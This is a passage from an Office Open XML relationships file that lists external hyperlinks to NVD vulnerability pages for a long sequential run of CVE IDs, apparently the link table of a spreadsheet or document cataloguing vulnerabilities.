Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90192" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90193" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90194" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90195" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90196" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90197" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90198" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90199" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90200" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90201" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90202" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90203" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90204" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90205" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90206" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90207" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90208" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90209" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90210" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90211" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90212" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90213" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90214" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90215" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90216" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90217" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90218" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90219" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90220" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90221" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90222" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90223" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90224" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90225" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90226" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90227" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90228" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90229" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90230" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90231" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90232" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90233" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90234" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90235" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90236" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90237" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90238" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90239" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90240" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90241" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90242" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90243" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90244" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90245" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90246" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90247" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90248" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90249" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90250" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90251" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90252" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90253" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90254" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90255" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90256" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90257" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90258" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90259" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90260" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90261" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90262" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90263" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90264" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90265" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90266" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90267" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90268" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90269" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90270" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90271" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90272" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90273" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90274" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90275" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90276" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90277" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90278" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90279" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90280" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90281" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90282" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90283" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90284" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90285" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90286" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90287" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90288" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90289" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90290" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90291" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90292" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90293" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90294" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90295" TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90296" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90297" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90298" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90299" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90300" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90301" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90302" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90303" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90304" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90305" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90306" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90307" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90308" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90309" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90310" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90311" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90312" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90313" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90314" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90315" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90316" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90317" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90318" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90319" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90320" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90321" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90322" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90323" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90324" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90325" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90326" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90327" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90328" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90329" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90330" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90331" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90332" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90333" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90334" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90335" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90336" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90337" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90338" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90339" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90340" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90341" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90342" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90343" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90344" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90345" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90346" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90347" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90348" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90349" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90350" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90351" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90352" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90353" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90354" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90355" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90356" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90357" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90358" TargetMode="External" Id="rId725" /><Relationship 